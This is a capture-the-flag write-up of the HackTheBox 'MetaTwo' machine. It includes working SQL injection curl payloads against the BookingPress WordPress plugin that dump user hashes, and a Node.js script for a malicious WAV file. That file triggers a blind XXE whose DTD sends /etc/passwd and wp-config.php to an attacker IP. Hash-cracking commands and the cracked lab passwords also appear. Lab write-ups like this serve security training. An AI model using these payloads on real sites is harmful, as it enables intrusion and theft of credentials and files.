8.2 KiB
HackTheBox Meta-Two
NMAP
Nmap scan report for metapress.htb (10.10.11.186)
Host is up (0.13s latency).
Not shown: 947 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
| 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open http nginx 1.18.0
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 5.6.2
|_http-title: MetaPress – Official company site
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-trane-info: Problem with XML parsing of /evox/about
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: nginx/1.18.0
PORT 80
Visting the webserver, it redirects to metapress.htb
data:image/s3,"s3://crabby-images/2a1e7/2a1e729ae7729317bbbe3e882c3c44c11a0b44eb" alt=""
Adding the domain name in /etc/hosts
file
data:image/s3,"s3://crabby-images/cfa85/cfa85048a06aa5073030f88343c6dcbebe91dcbd" alt=""
data:image/s3,"s3://crabby-images/64832/64832956c30471881f328ceb77b510d56afb83b9" alt=""
From wappalyzer, it seems that it's using wordpress version 5.6.2
data:image/s3,"s3://crabby-images/fc006/fc00643f10dc382cbc784dde70c786ac0b58779e" alt=""
So running wpscan
against the url
wpscan --url http://metapress.htb/
data:image/s3,"s3://crabby-images/4a2a7/4a2a7a889b3e8b3357a38aeae121c03828d40045" alt=""
data:image/s3,"s3://crabby-images/6a0e5/6a0e55479d62c39eaa68b024bc262d73bc08fcf8" alt=""
It only returned the version which we already knew but didn't found any plugins, searching for CVEs related to wordpress, it shows sql injection via WP_QUERY in wordpress version till 5.8.2 which means this version might be vulnerable as well but it didn't worked
data:image/s3,"s3://crabby-images/cbc48/cbc48bf3d9ca7dce5086ad5ed2202e504d4dd477" alt=""
There was another CVE specifically for this version but it was an authenticated XXE so probably we'll need to login
data:image/s3,"s3://crabby-images/159b1/159b169080bbf6a4e03b13266ad08e173e38461e" alt=""
data:image/s3,"s3://crabby-images/709c0/709c05e2940ccc19c95e8c353367be12277cf0f7" alt=""
data:image/s3,"s3://crabby-images/d5f7e/d5f7e23125a329499c5f4d729054dfece17443ad" alt=""
And this plugin has an un aunthenticated sql injection exploit
data:image/s3,"s3://crabby-images/b9458/b9458c438186c55260d49d79fff90c3ac4005c96" alt=""
data:image/s3,"s3://crabby-images/7f6c1/7f6c17ff76baa8d074f1903bda3307b8f4c720d2" alt=""
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=ef5a981727&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
data:image/s3,"s3://crabby-images/89a25/89a2582f5ecc3cca9ee414c51c8c90bf81d57d9d" alt=""
We can manully dump the data by first enumerating the table names
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(table_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.tables where table_schema=database()-- -'
data:image/s3,"s3://crabby-images/98afb/98afb68e9e736f295a393a6120075e2d4f36d07c" alt=""
Foothold
Now we need to get the column names for wp_users
because that's the table where wordpress saves user credentials but when I tried dumping the column names for some reason it wasn't working
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(column_name),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from information_schema.columns where table_name=wp_users-- -'
data:image/s3,"s3://crabby-images/e015e/e015e774ecc1748ab4911afb6d4d49f15cd94b8e" alt=""
But we don't have to worry about getting column names as it's wordpress so we can google for columns for wp_users table
data:image/s3,"s3://crabby-images/f1cd8/f1cd881d27196e1f606f83ebc2877551879ad829" alt=""
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
--data 'action=bookingpress_front_get_category_services&_wpnonce=0fa9f4afbd&category_id=33&total_service=-7502) UNION ALL SELECT group_concat(user_login,user_pass),@@version_comment,@@version_compile_os,1,2,3,4,5,6 from wp_users-- -'
data:image/s3,"s3://crabby-images/67163/67163bc08f60cc2b42efa4183018aa8bbf3b176e" alt=""
Cracking the hashes with hashcat
, we'll get manager's hash cracked with the password partylikearockstar
hashcat -a 0 -m 400 ./hash.txt /usr/share/wordlists/rockyou.txt --force
data:image/s3,"s3://crabby-images/0a1b6/0a1b62a9138c15c50442adbcafa169a6792f8481" alt=""
data:image/s3,"s3://crabby-images/a74b5/a74b52c0904706a7f5f61b0d2c36a2939a9a1702" alt=""
data:image/s3,"s3://crabby-images/ff12e/ff12e96ae33fc080d5aa4db85de75a73e64704ab" alt=""
With these credentials we can login into the dashboard of wordpress but there's nothing much we could do with this user
data:image/s3,"s3://crabby-images/991e1/991e16c473a39a126f91b94a226a37b0394d9161" alt=""
Looking back at the authenticated XXE, we can try that
data:image/s3,"s3://crabby-images/98cc1/98cc1f8d5ee3b6fc20a5f819c451fe7265646997" alt=""
We need to generate a malicious wav file which will perform an out of band or blind XXE attack by fetching the dtd from our server which is going to read the /etc/passwd
file and present the output to us
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
const fs = require('fs');
const wavefile = require('wavefile');
let wav = new wavefile.WaveFile();
wav.fromScratch(1, 44100, '32', [0, -2147483, 2147483, 4]);
wav.setiXML('<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM \'http://10.10.14.13:2222/uwu.dtd\'>%remote;%init;%trick;]>');
fs.writeFileSync('malicious.wav', wav.toBuffer());
Before running the script, make sure install wavefile
npm package with npm -i wavefile
data:image/s3,"s3://crabby-images/1bcdc/1bcdc640d77aed60068144ef1a206c153b62c58a" alt=""
Simply upload the malicious.wav
file through Media Library
option and check the listener
data:image/s3,"s3://crabby-images/a26d0/a26d01184db5c83d1215668caeaef213ab7ee16f" alt=""
data:image/s3,"s3://crabby-images/4428b/4428b54b1b29bcc2e9c8f74b96b26f46a0af1af3" alt=""
Now reading wp-config.php
which should one directory back
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.13:2222/?p=%file;'>" >
data:image/s3,"s3://crabby-images/80ef4/80ef40bc9e4cbef1da4d77170cac1968d4fff1bd" alt=""
With these credentials we can login to ftp
data:image/s3,"s3://crabby-images/72704/7270447bfe02854f0ae58685809a3447c68f678e" alt=""
By going into mailer
directoy, there's send_mail.php
from where we can find jnelson's password and login through ssh
data:image/s3,"s3://crabby-images/2175c/2175c1412ec3b56ce7537d8e07f7c5c2c8a45a1b" alt=""
Running sudo -l
we see that this user isn't in sudeors group
data:image/s3,"s3://crabby-images/73756/73756c943ce75cab089e9370586968023dec0565" alt=""
Privilege Escalation
Checking the files which are owned by jnelson group, we see few files related to passpie
which is a command line manager
data:image/s3,"s3://crabby-images/be536/be5361b714e206c7c43162b81a11c37565fa54c9" alt=""
Here we'll see the pgp message that is encrypted
data:image/s3,"s3://crabby-images/698fa/698fa9a7163f55b1d6a932739eb8b57085805b45" alt=""
We'll also find the pgp private key from /home/.passpie/keys
data:image/s3,"s3://crabby-images/63f3c/63f3cc7dba0e7dc637ad8ec8d26376daab1d28db" alt=""
To crack the pgp message we need to know the password of the private key so that we can import it and do that we can use gpg2john
/usr/sbin/gpg2john ./private.key > private_hash
data:image/s3,"s3://crabby-images/1d11a/1d11abc45a7c257653d053d41c96397e09f606b9" alt=""
john --wordlist=/usr/share/wordlists/rockyou.txt private_hash
data:image/s3,"s3://crabby-images/2728d/2728dd8f73e79d51f852f5a1f0bf9010a9a7a896" alt=""
With the password blink182
we can import the private key
data:image/s3,"s3://crabby-images/9eb23/9eb23b0ce758df32aae3efa88593fcb36c921f3d" alt=""
data:image/s3,"s3://crabby-images/ef9d9/ef9d9489e77a243f991549f1e359bee301f158ee" alt=""
Which might be the password for root user, so switching to root user
data:image/s3,"s3://crabby-images/591ac/591ac710dd4f246f313640fe1398ea060aa9ffd9" alt=""
We can export passwords from passpie as well with export
option by specifying the private key password and the path where we want to save the file
data:image/s3,"s3://crabby-images/cd7ed/cd7ed548d8343d305d30dfe0fe8af8c9bb26080c" alt=""